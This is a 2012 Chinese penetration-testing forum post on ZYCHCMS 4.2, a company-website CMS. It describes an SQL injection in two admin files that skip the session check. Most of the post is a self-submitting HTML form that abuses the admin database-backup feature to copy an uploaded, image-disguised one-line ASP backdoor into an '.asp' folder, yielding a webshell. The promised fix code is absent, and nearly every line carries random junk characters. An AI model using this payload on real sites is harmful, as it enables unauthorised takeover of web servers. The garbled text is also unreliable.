中国网络渗透测试联盟

标题: ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell [打印本页]
作者: admin    时间: 2012-9-10 21:09
标题: ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell
4 Q( }  f+ E. ?2 @# \

5 I, b4 K: b! I' `5 q, h2 m: @3 B' @4 e# p3 B  j# ~
4 J4 t. X$ t& y" i! A
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)5 v# q; x+ v2 ]% S
①SQL注射漏洞
! h; H& |+ t( D7 f6 } 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
; ~$ z3 w4 t( e" w, t" a 漏洞原因:未过滤4 F0 F! o% M% R
漏洞代码:
6 f! E, q) R' X2 y( ]7 U 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
. R3 g1 ^5 h/ c* S3 T7 H# S, f% g 修复方法:在文件开头加入代码  P7 O3 b5 s0 `# ~8 z, T
4 }0 [  Z2 O3 U4 i+ d1 [! Z
/ I$ A; L" E: U5 `& Q* S2 \, L
②后台拿WBSHELL! I% j9 k9 Y5 V7 l
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
# z# q- ]4 q; v' M# ] 这里在网上找了一个,改了下,将就着用。1 h' \& U: Y* t! Y
以下是代码本地提交代码/ Q4 a9 `; |' |) Y& \

- \/ X( @. L/ p) h8 G
4 z% l+ ^% w6 @4 @<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
* H" S$ t4 |) j% ]6 |/ \- e <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>) x3 P5 _* w8 Q) m8 x/ {
<tr>
% B4 R- X7 s1 |% ?7 J1 e8 J" v <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>$ C' B( F9 I3 a9 Y5 h8 t2 ~
</tr>
- o  W- W6 V+ @( f3 x <tr>$ G( a) ^, ]  |: u  `. [
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
: u/ w8 X0 n! {+ T( l </span>9 z6 ^, y7 J) P( r' b( [4 e" q
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >6 A* ~: h3 S6 b9 H% b5 l# H
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
$ Z6 Q9 p$ n  U1 o+ o5 ` <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>. Z0 W* v9 I, ]0 [% ^' W: h' {8 g
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d! u3 \/ w$ I- M8 E
<div align=”left”>
$ P* q8 b! B+ u4 \; g8 T <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
0 H4 w, d, {) _& J <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
4 _8 s) O$ I) Z- D5 U  W <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
. u3 ^! t2 a* I$ |6 f/ s </div></td>
6 \+ r, f; O7 C; M7 o </tr>* O6 x' p) P* |
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>7 i" ^5 u; ~9 I
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
& e* J; Q" s5 ?+ i7 Y7 \ <td class=”td”><div align=”left”>
4 l7 f. N& B6 \+ U6 J" c <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
2 L* q; N9 ?4 h) u [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>$ T4 x4 \% x9 I, B% t6 l
</tr>
4 Q+ q! [9 D4 |* l <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>* V5 k4 I0 D% G0 z
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
0 i7 N/ f: \" ~( w$ O* [( ? <td class=”td”><div align=”left”>. b  X: k8 N6 Z1 ?. Q1 i) T
<input type=”submit” value=”确定备份” class=”btn”
8 b. m1 \' S$ b </div></td>
9 R7 g! T6 z5 G$ f </tr>8 V5 d; F5 G# N# Y' s
</table></td></tr></form>
0 E1 L" N- x! I! H% t; n </table>
) Q& z) ^' g, F; m; P3 J7 g </td>8 K$ p7 d/ F' N5 X* V/ x8 W
</tr>9 X  E2 a! C. k( _7 f  K# l, Y5 s
</table>8 \1 |$ f' A2 V/ S$ A
<script>0 g9 U3 C! y7 C- X8 ^' e
document.all.add.submit();
/ r9 X+ K; W$ x, [6 `3 N </script>, o* v; W6 h5 O" z, ?5 {
! s) V7 r% q0 |; O! x

$ r) y5 y. S6 R" F: ?, t: D$ G+ @: d* A% D
; u% a. H6 ^! N8 C  B

; N) w' T' i- A3 _- \. b
) [& M! u  @: E
: |% A+ k! I, W
- z* |, d$ T" s- E4 z- b& m% O8 w( ?, p: D. L
% E+ C2 ~' h0 G* S* r0 I: k




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2